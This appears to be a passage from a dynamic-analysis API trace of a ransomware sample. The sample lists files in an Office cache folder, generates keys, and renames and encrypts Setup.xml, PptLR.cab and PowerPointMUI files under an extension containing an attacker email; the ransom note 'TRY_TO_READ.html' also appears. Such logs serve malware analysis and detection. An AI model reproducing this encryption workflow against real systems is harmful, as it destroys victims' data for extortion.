Size=0x80) returned 0x328ac8 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0118.742] GetLastError () returned 0x0 [0118.742] FindNextFileW (in: hFindFile=0x35de58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0118.742] GetLastError () returned 0x0 [0118.742] FindNextFileW (in: hFindFile=0x35de58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0118.742] GetLastError () returned 0x0 [0118.742] FindNextFileW (in: hFindFile=0x35de58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0118.742] GetLastError () returned 0x0 [0118.742] FindNextFileW (in: hFindFile=0x35de58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0118.742] GetLastError () returned 0x0 [0118.742] FindNextFileW (in: hFindFile=0x35de58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971aaa50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0118.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ac8 [0118.742] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0118.742] GetLastError () returned 0x0 [0118.742] FindNextFileW (in: hFindFile=0x35de58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971aaa50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0118.743] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385158 [0118.743] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0118.743] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0118.743] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0118.743] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0118.743] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0118.743] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0118.743] GetProcessHeap () returned 0x2e0000 [0118.743] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x385200 [0118.743] lstrcpyW (in: lpString1=0x385200, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" [0118.743] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0118.743] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0118.745] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474 [0118.746] GetProcessHeap () returned 0x2e0000 [0118.746] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385200 | out: hHeap=0x2e0000) returned 1 [0118.746] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1886) returned 1 [0118.746] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x75e [0118.746] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0118.746] GetProcessHeap () returned 0x2e0000 [0118.746] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0118.746] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0118.746] WriteFile (in: hFile=0x474, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0118.749] WriteFile (in: hFile=0x474, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0118.749] WriteFile (in: hFile=0x474, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0118.749] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x75e) returned 0x385200 [0118.749] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x75e) returned 0x385968 [0118.749] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.749] ReadFile (in: hFile=0x474, lpBuffer=0x385200, nNumberOfBytesToRead=0x75e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385200*, lpNumberOfBytesRead=0x2acf9c8*=0x75e, lpOverlapped=0x0) returned 1 [0118.749] SetFilePointer (in: hFile=0x474, lDistanceToMove=-1886, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.749] WriteFile (in: hFile=0x474, lpBuffer=0x385968*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385968*, lpNumberOfBytesWritten=0x2acf9c8*=0x75e, lpOverlapped=0x0) returned 1 [0118.749] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385200 | out: hHeap=0x2e0000) returned 1 [0118.749] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385968 | out: hHeap=0x2e0000) returned 1 [0118.749] CloseHandle (hObject=0x474) returned 1 [0118.750] GetProcessHeap () returned 0x2e0000 [0118.750] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0118.750] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0118.750] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0118.750] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385158 | out: hHeap=0x2e0000) returned 1 [0118.750] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x312a78 | out: hHeap=0x2e0000) returned 1 [0118.750] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x312a78 [0118.750] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0118.750] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0118.750] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0118.750] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0118.750] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", dwFileAttributes=0x80) returned 1 [0118.753] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 73 [0118.753] GetProcessHeap () returned 0x2e0000 [0118.753] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x385158 [0118.753] lstrcpyW (in: lpString1=0x385158, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" [0118.753] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0118.754] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0118.755] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474 [0118.755] GetProcessHeap () returned 0x2e0000 [0118.755] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385158 | out: hHeap=0x2e0000) returned 1 [0118.756] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=70361744) returned 1 [0118.756] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x431a290 [0118.756] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0118.756] GetProcessHeap () returned 0x2e0000 [0118.756] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0118.756] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0118.756] WriteFile (in: hFile=0x474, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0118.760] WriteFile (in: hFile=0x474, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0118.760] WriteFile (in: hFile=0x474, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0118.760] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x431a290) returned 0x30d0020 [0118.762] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x431a290) returned 0x73f0020 [0118.764] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.764] ReadFile (in: hFile=0x474, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x431a290, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x431a290, lpOverlapped=0x0) returned 1 [0131.641] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0131.641] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0131.641] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", dwFileAttributes=0x80) returned 1 [0131.642] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 81 [0131.642] GetProcessHeap () returned 0x2e0000 [0131.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x108) returned 0x319c88 [0131.642] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" [0131.642] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0131.642] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0131.645] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474 [0131.646] GetProcessHeap () returned 0x2e0000 [0131.646] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0131.646] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1450) returned 1 [0131.646] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5aa [0131.646] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0131.646] GetProcessHeap () returned 0x2e0000 [0131.646] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0131.646] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0131.646] WriteFile (in: hFile=0x474, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0131.648] WriteFile (in: hFile=0x474, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0131.648] WriteFile (in: hFile=0x474, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0131.648] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5aa) returned 0x385368 [0131.648] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5aa) returned 0x385920 [0131.648] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.648] ReadFile (in: hFile=0x474, lpBuffer=0x385368, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385368*, lpNumberOfBytesRead=0x2acf9c8*=0x5aa, lpOverlapped=0x0) returned 1 [0131.648] SetFilePointer (in: hFile=0x474, lDistanceToMove=-1450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.648] WriteFile (in: hFile=0x474, lpBuffer=0x385920*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385920*, lpNumberOfBytesWritten=0x2acf9c8*=0x5aa, lpOverlapped=0x0) returned 1 [0131.648] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0131.648] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385920 | out: hHeap=0x2e0000) returned 1 [0131.648] CloseHandle (hObject=0x474) returned 1 [0131.650] GetProcessHeap () returned 0x2e0000 [0131.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0131.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0131.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0131.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33acb8 | out: hHeap=0x2e0000) returned 1 [0131.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0131.650] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0131.650] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0131.650] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0131.650] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0131.650] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0131.650] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", dwFileAttributes=0x80) returned 1 [0131.650] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 81 [0131.650] GetProcessHeap () returned 0x2e0000 [0131.650] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x108) returned 0x319c88 [0131.650] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" [0131.650] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0131.651] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all 